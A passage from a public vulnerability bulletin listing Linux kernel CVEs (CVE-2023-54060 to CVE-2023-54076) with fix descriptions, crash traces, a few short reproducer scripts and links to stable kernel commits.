iommufd_fops_ioctl+0xfb/0x170 [iommufd] __x64_sys_ioctl+0x40d/0x9a0 do_syscall_64+0x3c/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2023-54060 | https://git.kernel.org/stable/c/176f36a376c417b58d19f79edfce20db9317eaa2 https://git.kernel.org/stable/c/b7c822fa6b7701b17e139f1c562fc24135880ed4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: fix clear_user_rep_good() exception handling annotation This code no longer exists in mainline, because it was removed in commit d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") upstream. However, rather than backport the full range of x86 memory clearing and copying cleanups, fix the exception table annotation placement for the final 'rep movsb' in clear_user_rep_good(): rather than pointing at the actual instruction that did the user space access, it pointed to the register move just before it. That made sense from a code flow standpoint, but not from an actual usage standpoint: it means that if user access takes an exception, the exception handler won't actually find the instruction in the exception tables. As a result, rather than fixing it up and returning -EFAULT, it would then turn it into a kernel oops report instead, something like: BUG: unable to handle page fault for address: 0000000020081000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page ... RIP: 0010:clear_user_rep_good+0x1c/0x30 arch/x86/lib/clear_page_64.S:147 ... Call Trace: __clear_user arch/x86/include/asm/uaccess_64.h:103 [inline] clear_user arch/x86/include/asm/uaccess_64.h:124 [inline] iov_iter_zero+0x709/0x1290 lib/iov_iter.c:800 iomap_dio_hole_iter fs/iomap/direct-io.c:389 [inline] iomap_dio_iter fs/iomap/direct-io.c:440 [inline] __iomap_dio_rw+0xe3d/0x1cd0 fs/iomap/direct-io.c:601 iomap_dio_rw+0x40/0xa0 fs/iomap/direct-io.c:689 ext4_dio_read_iter fs/ext4/file.c:94 [inline] ext4_file_read_iter+0x4be/0x690 fs/ext4/file.c:145 call_read_iter include/linux/fs.h:2183 [inline] do_iter_readv_writev+0x2e0/0x3b0 fs/read_write.c:733 do_iter_read+0x2f2/0x750 fs/read_write.c:796 vfs_readv+0xe5/0x150 fs/read_write.c:916 do_preadv+0x1b6/0x270 fs/read_write.c:1008 __do_sys_preadv2 fs/read_write.c:1070 [inline] __se_sys_preadv2 fs/read_write.c:1061 [inline] __x64_sys_preadv2+0xef/0x150 fs/read_write.c:1061 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd which then looks like a filesystem bug rather than the incorrect exception annotation that it is. [ The alternative to this one-liner fix is to take the upstream series that cleans this all up: 68674f94ffc9 ("x86: don't use REP_GOOD or ERMS for small memory copies") 20f3337d350c ("x86: don't use REP_GOOD or ERMS for small memory clearing") adfcf4231b8c ("x86: don't use REP_GOOD or ERMS for user memory copies") * d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") 3639a535587d ("x86: move stac/clac from user copy routines into callers") 577e6a7fd50d ("x86: inline the 'rep movs' in user copies for the FSRM case") 8c9b6a88b7e2 ("x86: improve on the non-rep 'clear_user' function") 427fda2c8a49 ("x86: improve on the non-rep 'copy_user' function") * e046fe5a36a9 ("x86: set FSRS automatically on AMD CPUs that have FSRM") e1f2750edc4a ("x86: remove 'zerorest' argument from __copy_user_nocache()") 034ff37d3407 ("x86: rewrite '__copy_user_nocache' function") with either the whole series or at a minimum the two marked commits being needed to fix this issue ] | 2025-12-24 | not yet calculated | CVE-2023-54061 | https://git.kernel.org/stable/c/b805d212c394f291f116b12c53401e7ba0c4d408 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix invalid free tracking in ext4_xattr_move_to_block() In ext4_xattr_move_to_block(), the value of the extended attribute which we need to move to an external block may be allocated by kvmalloc() if the value is stored in an external inode. So at the end of the function the code tried to check if this was the case by testing entry->e_value_inum. However, at this point, the pointer to the xattr entry is no longer valid, because it was removed from the original location where it had been stored. So we could end up calling kvfree() on a pointer which was not allocated by kvmalloc(); or we could also potentially leak memory by not freeing the buffer when it should be freed. Fix this by storing whether it should be freed in a separate variable. | 2025-12-24 | not yet calculated | CVE-2023-54062 | https://git.kernel.org/stable/c/76887be2a96193cd11be818551b8934ecdb3123f https://git.kernel.org/stable/c/f30f3391d089dc91aef91d08f4b04a6c0df2b067 https://git.kernel.org/stable/c/ba04d6af5ac440a6d5a2d35dc1d8e2cb0323550a https://git.kernel.org/stable/c/1a8822343e67432b658145d2760a524c884da9d4 https://git.kernel.org/stable/c/8beaa3cb293a8f7bacf711cf52201d59859dbc40 https://git.kernel.org/stable/c/c5fa4eedddd1c8342ce533cb401c0e693e55b4e3 https://git.kernel.org/stable/c/a18670395e5f28acddeca037c5e4bd2ea961b70a https://git.kernel.org/stable/c/b2fab1807d26acd1c6115b95b5eddd697d84751b https://git.kernel.org/stable/c/b87c7cdf2bed4928b899e1ce91ef0d147017ba45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix OOB read in indx_insert_into_buffer Syzbot reported a OOB read bug: BUG: KASAN: slab-out-of-bounds in indx_insert_into_buffer+0xaa3/0x13b0 fs/ntfs3/index.c:1755 Read of size 17168 at addr ffff8880255e06c0 by task syz-executor308/3630 Call Trace: <TASK> memmove+0x25/0x60 mm/kasan/shadow.c:54 indx_insert_into_buffer+0xaa3/0x13b0 fs/ntfs3/index.c:1755 indx_insert_entry+0x446/0x6b0 fs/ntfs3/index.c:1863 ntfs_create_inode+0x1d3f/0x35c0 fs/ntfs3/inode.c:1548 ntfs_create+0x3e/0x60 fs/ntfs3/namei.c:100 lookup_open fs/namei.c:3413 [inline] If the member struct INDEX_BUFFER *index of struct indx_node is incorrect, that is, the value of __le32 used is greater than the value of __le32 total in struct INDEX_HDR. Therefore, OOB read occurs when memmove is called in indx_insert_into_buffer(). Fix this by adding a check in hdr_find_e(). | 2025-12-24 | not yet calculated | CVE-2023-54063 | https://git.kernel.org/stable/c/cd7e1d67924081717c5c96ead758a1a77867689a https://git.kernel.org/stable/c/17048287ac79abd33b275ac3b5738285d406481b https://git.kernel.org/stable/c/a7e5dba10ba1402dd6c2f961a70320770865c4a5 https://git.kernel.org/stable/c/4bf3b564e27a518f158a83d5e1a50064ed6136a0 https://git.kernel.org/stable/c/b8c44949044e5f7f864525fdffe8e95135ce9ce5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:ssif: Fix a memory leak when scanning for an adapter The adapter scan ssif_info_find() sets info->adapter_name if the adapter info came from SMBIOS, as it's not set in that case. However, this function can be called more than once, and it will leak the adapter name if it had already been set. So check for NULL before setting it. | 2025-12-24 | not yet calculated | CVE-2023-54064 | https://git.kernel.org/stable/c/de677f4379fa67f650e367c188a0f80bee9b6732 https://git.kernel.org/stable/c/13623b966bb6d36ba61646b69cd49cdac6e4978a https://git.kernel.org/stable/c/3ad53071fe8547eb8d8813971844cc43246008ee https://git.kernel.org/stable/c/74a1194cce60a90723d0fe148863c18931a31153 https://git.kernel.org/stable/c/7db16d2e791bf2ec3e0249f56b7ec81c35bba6e6 https://git.kernel.org/stable/c/b870caeb18041f856893066ded81c560db3d56cc https://git.kernel.org/stable/c/b8d72e32e1453d37ee5c8a219f24e7eeadc471ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: realtek: fix out-of-bounds access The probe function sets priv->chip_data to (void *)priv + sizeof(*priv) with the expectation that priv has enough trailing space. However, only realtek-smi actually allocated this chip_data space. Do likewise in realtek-mdio to fix out-of-bounds accesses. These accesses likely went unnoticed so far, because of an (unused) buf[4096] member in struct realtek_priv, which caused kmalloc to round up the allocated buffer to a big enough size, so nothing of value was overwritten. With a different allocator (like in the barebox bootloader port of the driver) or with KASAN, the memory corruption becomes quickly apparent. | 2025-12-24 | not yet calculated | CVE-2023-54065 | https://git.kernel.org/stable/c/cc0f9bb99735d2b68fac68f37b585d615728ce5b https://git.kernel.org/stable/c/fe668aa499b4b95425044ba11af9609db6ecf466 https://git.kernel.org/stable/c/b93eb564869321d0dffaf23fcc5c88112ed62466 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer In gl861_i2c_master_xfer, msg is controlled by user. When msg[i].buf is null and msg[i].len is zero, former checks on msg[i].buf would be passed. Malicious data finally reach gl861_i2c_master_xfer. If accessing msg[i].buf[0] without sanity check, null ptr deref would happen. We add check on msg[i].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") | 2025-12-24 | not yet calculated | CVE-2023-54066 | https://git.kernel.org/stable/c/578b67614ae0e4fba3945b66a4c8f9ae77115bcb https://git.kernel.org/stable/c/2a33fc57133d6f39d62285df6706aeb1714967f1 https://git.kernel.org/stable/c/dfcd3c010209927b9f45b860f046635dc32e32e1 https://git.kernel.org/stable/c/72af676551efe820e309a6c7681c2c4372f37376 https://git.kernel.org/stable/c/b97719a66970601cd3151a3e2020f4454a1c4ff6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race when deleting free space root from the dirty cow roots list When deleting the free space tree we are deleting the free space root from the list fs_info->dirty_cowonly_roots without taking the lock that protects it, which is struct btrfs_fs_info::trans_lock. This unsynchronized list manipulation may cause chaos if there's another concurrent manipulation of this list, such as when adding a root to it with ctree.c:add_root_to_dirty_list(). This can result in all sorts of weird failures caused by a race, such as the following crash: [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.279928] Code: 85 38 06 00 (...) [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206 [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000 [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070 [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600 [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48 [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000 [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0 [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [337571.282874] Call Trace: [337571.283101] <TASK> [337571.283327] ? __die_body+0x1b/0x60 [337571.283570] ? die_addr+0x39/0x60 [337571.283796] ? exc_general_protection+0x22e/0x430 [337571.284022] ? asm_exc_general_protection+0x22/0x30 [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs] [337571.284803] ? _raw_spin_unlock+0x15/0x30 [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs] [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs] [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs] [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410 [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs] [337571.286358] ? mod_objcg_state+0xd2/0x360 [337571.286577] ? refill_obj_stock+0xb0/0x160 [337571.286798] ? seq_release+0x25/0x30 [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0 [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0 [337571.287455] ? __x64_sys_ioctl+0x88/0xc0 [337571.287675] __x64_sys_ioctl+0x88/0xc0 [337571.287901] do_syscall_64+0x38/0x90 [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc [337571.288352] RIP: 0033:0x7f478aaffe9b So fix this by locking struct btrfs_fs_info::trans_lock before deleting the free space root from that list. | 2025-12-24 | not yet calculated | CVE-2023-54067 | https://git.kernel.org/stable/c/6f1c81886b0b56cb88b311e5d2f203625474d892 https://git.kernel.org/stable/c/8ce9139aea5e60a247bde5af804312f54975f443 https://git.kernel.org/stable/c/babebf023e661b90b1c78b2baa384fb03a226879 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: compress: fix to call f2fs_wait_on_page_writeback() in f2fs_write_raw_pages() BUG_ON() will be triggered when writing files concurrently, because the same page is writtenback multiple times. 1597 void folio_end_writeback(struct folio *folio) 1598 { ...... 1618 if (!__folio_end_writeback(folio)) 1619 BUG(); ...... 1625 } kernel BUG at mm/filemap.c:1619! Call Trace: <TASK> f2fs_write_end_io+0x1a0/0x370 blk_update_request+0x6c/0x410 blk_mq_end_request+0x15/0x130 blk_complete_reqs+0x3c/0x50 __do_softirq+0xb8/0x29b ? sort_range+0x20/0x20 run_ksoftirqd+0x19/0x20 smpboot_thread_fn+0x10b/0x1d0 kthread+0xde/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x22/0x30 </TASK> Below is the concurrency scenario: [Process A] [Process B] [Process C] f2fs_write_raw_pages() - redirty_page_for_writepage() - unlock page() f2fs_do_write_data_page() - lock_page() - clear_page_dirty_for_io() - set_page_writeback() [1st writeback] ..... - unlock page() generic_perform_write() - f2fs_write_begin() - wait_for_stable_page() - f2fs_write_end() - set_page_dirty() - lock_page() - f2fs_do_write_data_page() - set_page_writeback() [2st writeback] This problem was introduced by the previous commit 7377e853967b ("f2fs: compress: fix potential deadlock of compress file"). All pagelocks were released in f2fs_write_raw_pages(), but whether the page was in the writeback state was ignored in the subsequent writing process. Let's fix it by waiting for the page to writeback before writing. | 2025-12-24 | not yet calculated | CVE-2023-54068 | https://git.kernel.org/stable/c/a8226a45b2a9ce83ba7a167a387a00fecc319e71 https://git.kernel.org/stable/c/169134da419cb8ffbe3b0743bc24573e16952ea9 https://git.kernel.org/stable/c/6604df2a9d07ba8f8fb1ac14046c2c83776faa4f https://git.kernel.org/stable/c/9940877c4fe752923a53f0f7372f2f152b6eccf0 https://git.kernel.org/stable/c/ad31eed06c3b4d63b2d38322a271d4009aee4bb3 https://git.kernel.org/stable/c/babedcbac164cec970872b8097401ca913a80e61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix BUG in ext4_mb_new_inode_pa() due to overflow When we calculate the end position of ext4_free_extent, this position may be exactly where ext4_lblk_t (i.e. uint) overflows. For example, if ac_g_ex.fe_logical is 4294965248 and ac_orig_goal_len is 2048, then the computed end is 0x100000000, which is 0. If ac->ac_o_ex.fe_logical is not the first case of adjusting the best extent, that is, new_bex_end > 0, the following BUG_ON will be triggered: ========================================================= kernel BUG at fs/ext4/mballoc.c:5116! invalid opcode: 0000 [#1] PREEMPT SMP PTI CPU: 3 PID: 673 Comm: xfs_io Tainted: G E 6.5.0-rc1+ #279 RIP: 0010:ext4_mb_new_inode_pa+0xc5/0x430 Call Trace: <TASK> ext4_mb_use_best_found+0x203/0x2f0 ext4_mb_try_best_found+0x163/0x240 ext4_mb_regular_allocator+0x158/0x1550 ext4_mb_new_blocks+0x86a/0xe10 ext4_ext_map_blocks+0xb0c/0x13a0 ext4_map_blocks+0x2cd/0x8f0 ext4_iomap_begin+0x27b/0x400 iomap_iter+0x222/0x3d0 __iomap_dio_rw+0x243/0xcb0 iomap_dio_rw+0x16/0x80 ========================================================= A simple reproducer demonstrating the problem: mkfs.ext4 -F /dev/sda -b 4096 100M mount /dev/sda /tmp/test fallocate -l1M /tmp/test/tmp fallocate -l10M /tmp/test/file fallocate -i -o 1M -l16777203M /tmp/test/file fsstress -d /tmp/test -l 0 -n 100000 -p 8 & sleep 10 && killall -9 fsstress rm -f /tmp/test/tmp xfs_io -c "open -ad /tmp/test/file" -c "pwrite -S 0xff 0 8192" We simply refactor the logic for adjusting the best extent by adding a temporary ext4_free_extent ex and use extent_logical_end() to avoid overflow, which also simplifies the code. | 2025-12-24 | not yet calculated | CVE-2023-54069 | https://git.kernel.org/stable/c/83ecffd40c65844a73c2e93d7c841455786605ac https://git.kernel.org/stable/c/58fe961c606c446f5612f6897827b1cac42c2e89 https://git.kernel.org/stable/c/f2c3a3aa6f11ad9878dbc3a067b0633e07b586c1 https://git.kernel.org/stable/c/fcefddf3a151b2c416b20120c06bb1ba9ad676fb https://git.kernel.org/stable/c/b7e9ec38b6a0beb5a49cd1e76be0a9a07c218e90 https://git.kernel.org/stable/c/bc056e7163ac7db945366de219745cf94f32a3e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: igb: clean up in all error paths when enabling SR-IOV After commit 50f303496d92 ("igb: Enable SR-IOV after reinit"), removing the igb module could hang or crash (depending on the machine) when the module has been loaded with the max_vfs parameter set to some value != 0. In case of one test machine with a dual port 82580, this hang occurred: [ 232.480687] igb 0000:41:00.1: removed PHC on enp65s0f1 [ 233.093257] igb 0000:41:00.1: IOV Disabled [ 233.329969] pcieport 0000:40:01.0: AER: Multiple Uncorrected (Non-Fatal) err0 [ 233.340302] igb 0000:41:00.0: PCIe Bus Error: severity=Uncorrected (Non-Fata) [ 233.352248] igb 0000:41:00.0: device [8086:1516] error status/mask=00100000 [ 233.361088] igb 0000:41:00.0: [20] UnsupReq (First) [ 233.368183] igb 0000:41:00.0: AER: TLP Header: 40000001 0000040f cdbfc00c c [ 233.376846] igb 0000:41:00.1: PCIe Bus Error: severity=Uncorrected (Non-Fata) [ 233.388779] igb 0000:41:00.1: device [8086:1516] error status/mask=00100000 [ 233.397629] igb 0000:41:00.1: [20] UnsupReq (First) [ 233.404736] igb 0000:41:00.1: AER: TLP Header: 40000001 0000040f cdbfc00c c [ 233.538214] pci 0000:41:00.1: AER: can't recover (no error_detected callback) [ 233.538401] igb 0000:41:00.0: removed PHC on enp65s0f0 [ 233.546197] pcieport 0000:40:01.0: AER: device recovery failed [ 234.157244] igb 0000:41:00.0: IOV Disabled [ 371.619705] INFO: task irq/35-aerdrv:257 blocked for more than 122 seconds. [ 371.627489] Not tainted 6.4.0-dirty #2 [ 371.632257] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this. [ 371.641000] task:irq/35-aerdrv state:D stack:0 pid:257 ppid:2 f0 [ 371.650330] Call Trace: [ 371.653061] <TASK> [ 371.655407] __schedule+0x20e/0x660 [ 371.659313] schedule+0x5a/0xd0 [ 371.662824] schedule_preempt_disabled+0x11/0x20 [ 371.667983] __mutex_lock.constprop.0+0x372/0x6c0 [ 371.673237] ? __pfx_aer_root_reset+0x10/0x10 [ 371.678105] report_error_detected+0x25/0x1c0 [ 371.682974] ? __pfx_report_normal_detected+0x10/0x10 [ 371.688618] pci_walk_bus+0x72/0x90 [ 371.692519] pcie_do_recovery+0xb2/0x330 [ 371.696899] aer_process_err_devices+0x117/0x170 [ 371.702055] aer_isr+0x1c0/0x1e0 [ 371.705661] ? __set_cpus_allowed_ptr+0x54/0xa0 [ 371.710723] ? __pfx_irq_thread_fn+0x10/0x10 [ 371.715496] irq_thread_fn+0x20/0x60 [ 371.719491] irq_thread+0xe6/0x1b0 [ 371.723291] ? __pfx_irq_thread_dtor+0x10/0x10 [ 371.728255] ? __pfx_irq_thread+0x10/0x10 [ 371.732731] kthread+0xe2/0x110 [ 371.736243] ? __pfx_kthread+0x10/0x10 [ 371.740430] ret_from_fork+0x2c/0x50 [ 371.744428] </TASK> The reproducer was a simple script: #!/bin/sh for i in `seq 1 5`; do modprobe -rv igb modprobe -v igb max_vfs=1 sleep 1 modprobe -rv igb done It turned out that this could only be reproduce on 82580 (quad and dual-port), but not on 82576, i350 and i210. Further debugging showed that igb_enable_sriov()'s call to pci_enable_sriov() is failing, because dev->is_physfn is 0 on 82580. Prior to commit 50f303496d92 ("igb: Enable SR-IOV after reinit"), igb_enable_sriov() jumped into the "err_out" cleanup branch. After this commit it only returned the error code. So the cleanup didn't take place, and the incorrect VF setup in the igb_adapter structure fooled the igb driver into assuming that VFs have been set up where no VF actually existed. Fix this problem by cleaning up again if pci_enable_sriov() fails. | 2025-12-24 | not yet calculated | CVE-2023-54070 | https://git.kernel.org/stable/c/0e3ea7e82a06014b9baf1b84ba579c38cbff3558 https://git.kernel.org/stable/c/bc6ed2fa24b14e40e1005488bbe11268ce7108fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: use work to update rate to avoid RCU warning The ieee80211_ops::sta_rc_update must be atomic, because ieee80211_chan_bw_change() holds rcu_read lock while calling drv_sta_rc_update(), so create a work to do original things. Voluntary context switch within RCU read-side critical section! WARNING: CPU: 0 PID: 4621 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x571/0x5d0 CPU: 0 PID: 4621 Comm: kworker/u16:2 Tainted: G W OE Workqueue: phy3 ieee80211_chswitch_work [mac80211] RIP: 0010:rcu_note_context_switch+0x571/0x5d0 Call Trace: <TASK> __schedule+0xb0/0x1460 ? __mod_timer+0x116/0x360 schedule+0x5a/0xc0 schedule_timeout+0x87/0x150 ? trace_raw_output_tick_stop+0x60/0x60 wait_for_completion_timeout+0x7b/0x140 usb_start_wait_urb+0x82/0x160 [usbcore usb_control_msg+0xe3/0x140 [usbcore rtw_usb_read+0x88/0xe0 [rtw_usb rtw_usb_read8+0xf/0x10 [rtw_usb rtw_fw_send_h2c_command+0xa0/0x170 [rtw_core rtw_fw_send_ra_info+0xc9/0xf0 [rtw_core drv_sta_rc_update+0x7c/0x160 [mac80211 ieee80211_chan_bw_change+0xfb/0x110 [mac80211 ieee80211_change_chanctx+0x38/0x130 [mac80211 ieee80211_vif_use_reserved_switch+0x34e/0x900 [mac80211 ieee80211_link_use_reserved_context+0x88/0xe0 [mac80211 ieee80211_chswitch_work+0x95/0x170 [mac80211 process_one_work+0x201/0x410 worker_thread+0x4a/0x3b0 ? process_one_work+0x410/0x410 kthread+0xe1/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54071 | https://git.kernel.org/stable/c/107677a8f43521e33e4a653e50fdf55ba622a4ce https://git.kernel.org/stable/c/dd3af22323e79a2ffabed366db20aab83716fe6f https://git.kernel.org/stable/c/bcafcb959a57a6890e900199690c5fc47da1a304 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: Fix potential data race at PCM memory allocation helpers The PCM memory allocation helpers have a sanity check against too many buffer allocations. However, the check is performed without a proper lock and the allocation isn't serialized; this allows user to allocate more memories than predefined max size. Practically seen, this isn't really a big problem, as it's more or less some "soft limit" as a sanity check, and it's not possible to allocate unlimitedly. But it's still better to address this for more consistent behavior. The patch covers the size check in do_alloc_pages() with the card->memory_mutex, and increases the allocated size there for preventing the further overflow. When the actual allocation fails, the size is decreased accordingly. | 2025-12-24 | not yet calculated | CVE-2023-54072 | https://git.kernel.org/stable/c/7e1d1456c8db9949459c5a24e8845cfe92430b0f https://git.kernel.org/stable/c/7e11c58b2620a22c67a5ae28d64ce383890ee9f4 https://git.kernel.org/stable/c/a0ab49e7a758b488b2090171a75d50735c0876f6 https://git.kernel.org/stable/c/3eb4e47a94e3f76521d7d344696db61e6a9619c7 https://git.kernel.org/stable/c/773ccad902f67583a58b5650a2f8d8daf2e76fac https://git.kernel.org/stable/c/bd55842ed998a622ba6611fe59b3358c9f76773d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Add !tpm_amd_is_rng_defective() to the hwrng_unregister() call site The following crash was reported: [ 1950.279393] list_del corruption, ffff99560d485790->next is NULL [ 1950.279400] ------------[ cut here ]------------ [ 1950.279401] kernel BUG at lib/list_debug.c:49! [ 1950.279405] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI [ 1950.279407] CPU: 11 PID: 5886 Comm: modprobe Tainted: G O 6.2.8_1 #1 [ 1950.279409] Hardware name: Gigabyte Technology Co., Ltd. B550M AORUS PRO-P/B550M AORUS PRO-P, BIOS F15c 05/11/2022 [ 1950.279410] RIP: 0010:__list_del_entry_valid+0x59/0xc0 [ 1950.279415] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 c6 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 08 a8 13 9e e8 b7 0a bc ff <0f> 0b 48 89 fe 48 c7 c7 38 a8 13 9e e8 a6 0a bc ff 0f 0b 48 89 fe [ 1950.279416] RSP: 0018:ffffa96d05647e08 EFLAGS: 00010246 [ 1950.279418] RAX: 0000000000000033 RBX: ffff99560d485750 RCX: 0000000000000000 [ 1950.279419] RDX: 0000000000000000 RSI: ffffffff9e107c59 RDI: 00000000ffffffff [ 1950.279420] RBP: ffffffffc19c5168 R08: 0000000000000000 R09: ffffa96d05647cc8 [ 1950.279421] R10: 0000000000000003 R11: ffffffff9ea2a568 R12: 0000000000000000 [ 1950.279422] R13: ffff99560140a2e0 R14: ffff99560127d2e0 R15: 0000000000000000 [ 1950.279422] FS: 00007f67da795380(0000) GS:ffff995d1f0c0000(0000) knlGS:0000000000000000 [ 1950.279424] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1950.279424] CR2: 00007f67da7e65c0 CR3: 00000001feed2000 CR4: 0000000000750ee0 [ 1950.279426] PKRU: 55555554 [ 1950.279426] Call Trace: [ 1950.279428] <TASK> [ 1950.279430] hwrng_unregister+0x28/0xe0 [rng_core] [ 1950.279436] tpm_chip_unregister+0xd5/0xf0 [tpm] Add the forgotten !tpm_amd_is_rng_defective() invariant to the hwrng_unregister() call site inside tpm_chip_unregister(). | 2025-12-24 | not yet calculated | CVE-2023-54073 | https://git.kernel.org/stable/c/1408d27f25c7b73ece7545cb6434965eedc49ddb https://git.kernel.org/stable/c/8da5ba044ea74105f3cfa182603b2f2d766fb22d https://git.kernel.org/stable/c/0af0a989e747248e05640980661225e5b94cdb9e https://git.kernel.org/stable/c/bd8621ca1510e6e802df9855bdc35a04a3cfa932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Use correct encap attribute during invalidation With introduction of post action infrastructure most of the users of encap attribute had been modified in order to obtain the correct attribute by calling mlx5e_tc_get_encap_attr() helper instead of assuming encap action is always on default attribute. However, the cited commit didn't modify mlx5e_invalidate_encap() which prevents it from destroying correct modify header action which leads to a warning [0]. Fix the issue by using correct attribute. [0]: Feb 21 09:47:35 c-237-177-40-045 kernel: WARNING: CPU: 17 PID: 654 at drivers/net/ethernet/mellanox/mlx5/core/en_tc.c:684 mlx5e_tc_attach_mod_hdr+0x1cc/0x230 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: RIP: 0010:mlx5e_tc_attach_mod_hdr+0x1cc/0x230 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: Call Trace: Feb 21 09:47:35 c-237-177-40-045 kernel: <TASK> Feb 21 09:47:35 c-237-177-40-045 kernel: mlx5e_tc_fib_event_work+0x8e3/0x1f60 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: ? mlx5e_take_all_encap_flows+0xe0/0xe0 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: ? lock_downgrade+0x6d0/0x6d0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x273/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x273/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: process_one_work+0x7c2/0x1310 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x3f0/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? pwq_dec_nr_in_flight+0x230/0x230 Feb 21 09:47:35 c-237-177-40-045 kernel: ? rwlock_bug.part.0+0x90/0x90 Feb 21 09:47:35 c-237-177-40-045 kernel: worker_thread+0x59d/0xec0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? __kthread_parkme+0xd9/0x1d0 | 2025-12-24 | not yet calculated | CVE-2023-54074 | https://git.kernel.org/stable/c/00959a1bad58e4b6c14a2729f84d354255073609 https://git.kernel.org/stable/c/b8b4292fdd8818ab43b943b6717811651f51e39f https://git.kernel.org/stable/c/be071cdb167fc3e25fe81922166b3d499d23e8ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: common: Fix refcount leak in parse_dai_link_info Add missing of_node_put()s before the returns to balance of_node_get()s and of_node_put()s, which may get unbalanced in case the for loop 'for_each_available_child_of_node' returns early. | 2025-12-24 | not yet calculated | CVE-2023-54075 | https://git.kernel.org/stable/c/3e40722d55805584dc04d8594d912820cafb2432 https://git.kernel.org/stable/c/beed115c2ce78f990222a29abed042582df4e87c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix missed ses refcounting Use new cifs_smb_ses_inc_refcount() helper to get an active reference of @ses and @ses->dfs_root_ses (if set). This will prevent @ses->dfs_root_ses of being put in the next call to cifs_put_smb_ses() and thus potentially causing an use-after-free bug. | 2025-12-24 | not yet calculated | CVE-2023-54076 | https://git.kernel.org/stable/c/eb382196e6f6e05cfafdab797840e5a96c6e7bf0 https://git.kernel.org/stable/c/bf99f6be2d20146942bce6f9e90a0ceef12cbc1e |
